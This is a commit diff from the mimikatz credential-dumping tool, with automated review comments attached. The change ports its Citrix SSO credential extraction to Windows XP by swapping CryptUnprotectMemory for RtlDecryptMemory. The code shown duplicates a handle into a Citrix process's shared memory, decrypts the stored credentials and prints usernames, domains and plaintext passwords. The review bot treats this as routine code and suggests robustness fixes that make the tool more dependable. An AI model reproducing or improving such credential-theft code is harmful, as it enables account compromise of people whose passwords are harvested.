[legacy] Some love for Windows XP (RtlDecryptMemory instead of CryptUnprotectMemory - did not exist)

Benjamin DELPY 2022-09-19 22:50:46 +02:00
parent 746e2116d1
commit 82cb7eb237
2 changed files with 6 additions and 5 deletions


@ -131,6 +131,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_11 22000 #define KULL_M_WIN_MIN_BUILD_11 22000
/* mimikatz 3 transition */ /* mimikatz 3 transition */
#define PRINT_ERROR_NUMBER(func, error) PRINT_ERROR(func L": 0x%08x\n", error)
#define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL)) #define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL))
#define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def)) #define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def))
#define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL)) #define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL))
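Review bot: The new PRINT_ERROR_NUMBER macro passes its `error` argument unparenthesized, unlike the GET_CLI_ARG family just below it, which wraps its whole expansion in parentheses; a caller passing an expression such as `a ? b : c` would expand differently than intended. The format is also `0x%08x`, which expects an unsigned value, while the one call site this commit adds passes an NTSTATUS (a LONG) — this works in practice on 32-bit LONG but is a signed/unsigned mismatch worth making explicit. Suggested: `#define PRINT_ERROR_NUMBER(func, error) PRINT_ERROR(func L": 0x%08x\n", (ULONG)(error))`, with a one-line comment noting it is meant for NTSTATUS/Win32 codes rather than GetLastError() (which PRINT_ERROR_AUTO already covers).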


@ -21,12 +21,9 @@ BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcess
{ {
DWORD i, ProcessId; DWORD i, ProcessId;
HANDLE hProcess; HANDLE hProcess;
//PKULL_M_MEMORY_HANDLE hMemory;
//KULL_M_MEMORY_ADDRESS aMemory = { NULL, &hMemory };
RTL_USER_PROCESS_PARAMETERS UserProcessParameters; RTL_USER_PROCESS_PARAMETERS UserProcessParameters;
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
PEB Peb; PEB Peb;
UNREFERENCED_PARAMETER(pvArg); UNREFERENCED_PARAMETER(pvArg);
@ -112,6 +109,7 @@ void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMap
HANDLE hFileMapping; HANDLE hFileMapping;
PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials; PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials;
PCITRIX_CREDENTIALS pCitrixCredentials; PCITRIX_CREDENTIALS pCitrixCredentials;
NTSTATUS nStatus;
if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0)) if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0))
{ {
@ -123,12 +121,13 @@ void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMap
if (pCitrixCredentials) if (pCitrixCredentials)
{ {
RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data)); RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data));
if (CryptUnprotectMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), CRYPTPROTECTMEMORY_CROSS_PROCESS)) nStatus = RtlDecryptMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), RTL_ENCRYPT_OPTION_CROSS_PROCESS); // CryptUnprotectMemory is not Windows XP friendly
if (nStatus == STATUS_SUCCESS)
{ {
CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword); CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword);
kprintf(L"| Username : %s\n| Domain : %s\n| Password : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags); kprintf(L"| Username : %s\n| Domain : %s\n| Password : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags);
} }
else PRINT_ERROR_AUTO(L"CryptUnprotectMemory"); else PRINT_ERROR_NUMBER(L"RtlDecryptMemory", nStatus);
LocalFree(pCitrixCredentials); LocalFree(pCitrixCredentials);
} }
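Review bot: The switch to RtlDecryptMemory at the `nStatus = RtlDecryptMemory(...)` line introduces an API precondition the hunk does not check: the length must be a multiple of RTL_ENCRYPT_MEMORY_SIZE (8), otherwise the call fails with an invalid-parameter status rather than decrypting. Since `sizeof(pCitrixPackedCredentials->Data)` presumably already satisfied CryptUnprotectMemory's 16-byte block requirement this is likely fine today, but a compile-time guard would pin it: `C_ASSERT(sizeof(((PCITRIX_PACKED_CREDENTIALS)NULL)->Data) % RTL_ENCRYPT_MEMORY_SIZE == 0);` near the struct definition. On the success path the buffer now holds plaintext credentials until `LocalFree(pCitrixCredentials)`; wiping it first with `RtlSecureZeroMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data));` avoids leaving the decrypted copy in freed heap memory. The comment `// CryptUnprotectMemory is not Windows XP friendly` would be clearer as `// RtlDecryptMemory (SystemFunction041) exists on XP; CryptUnprotectMemory requires Vista+`. The body of Citrix_SSO_Program_FileMapping continues past the end of this hunk.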